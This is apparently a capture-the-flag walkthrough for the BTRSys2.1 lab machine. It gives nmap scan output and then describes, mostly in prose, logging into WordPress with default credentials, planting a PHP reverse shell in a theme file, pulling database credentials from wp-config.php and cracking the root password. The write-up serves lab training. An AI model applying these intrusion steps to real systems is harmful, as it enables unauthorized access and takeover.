BTRSys2.1

nmap

(base) [psdon@arch BTRSys2.1]$ mkdir nmap
(base) [psdon@arch BTRSys2.1]$ sudo rustscan -a 192.168.208.50 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
# Nmap 7.92 scan initiated Thu Aug 26 20:10:30 2021 as: nmap -vvv -p 21,22,80 -T4 -A -oA nmap/all-ports-service-scan 192.168.208.50
Nmap scan report for 192.168.208.50 (192.168.208.50)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2021-08-26 20:10:30 PST for 21s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.208
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKrYYWK3Xv2EBb0KryPAargHdeVdVuGj+AHTUbH1CyLIuQ3zbtaq2+lr5K/aMqiJ5othz27+RWSJ2NmQ2JeOUBCogFLikCwU6MRDQLHpV+neS3fAKrH5fNnXo+RfnMWBLQaaXBPiUOQaoQc27hRN3SJ1hbVLEF65TY0siTrOj0Lt8SRztwkbfynHEKxMsQi5WWDLTgS7bivCf9VVWwqgmuBbsJAqFExDjLxlxJpH4+93bgEtD9EPV/KKO9B3Inaz8PxC+zXZofhZXloysYoGg4IZzT55JzrRVRuv/cbGcMuGTBpCCkdH01G4NCSgL7YwX13C1Qc+EFX1QExV6k1ePD
|   256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFTsqff4O0hsl+RUR2lXFcbCEkvFcspHALA2RR2DpoD2AlRN/DEpIbW3NETNXxxyKHTtGhUiBSUuw8S9RSBAsnY=
|   256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH91w++CdkbeAkmXYietVhD/73nEaXR/nbeBEyuwLwgq
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Port 80 is open, let's check /robots.txt

WordPress

You can see robots.txt contains an interesting directory, called /wordpress . Let's see if we can log in using the default credentials. Let's try to login using admin as username and password.

Looks like we were able to log in using that credentials.

Initial Foothold

To get a reverse shell, set a netcat listener first.

Then go to theme editor, and let's set the payload

Find a file you want to overwrite with your PHP reverse shell payload. In my case, I will be going to use the 404.php file.

Edit the file, paste your payload and save. You can use this PHP reverse shell payload, but you can use whatever you prefer.

Visit /wordpress/wp-content/themes/twentyfourteen/404.php and you should have received your shell in your terminal

Post Exploitation

Let's check the wp-config.php

There's a MySQL credential on the file, let's try to log in using root as username and rootpassword! as password.

I found credentials inside wordpress database.

I have cracked the hashed user_pass of the root user using crackingstation.net

The password we have cracked is roottoor

Privilege Escalation

Let's try to login as root using the credentials we have cracked above.

You are now root!

PreviousLinuxNextCyberSploit1

Last updated

Was this helpful?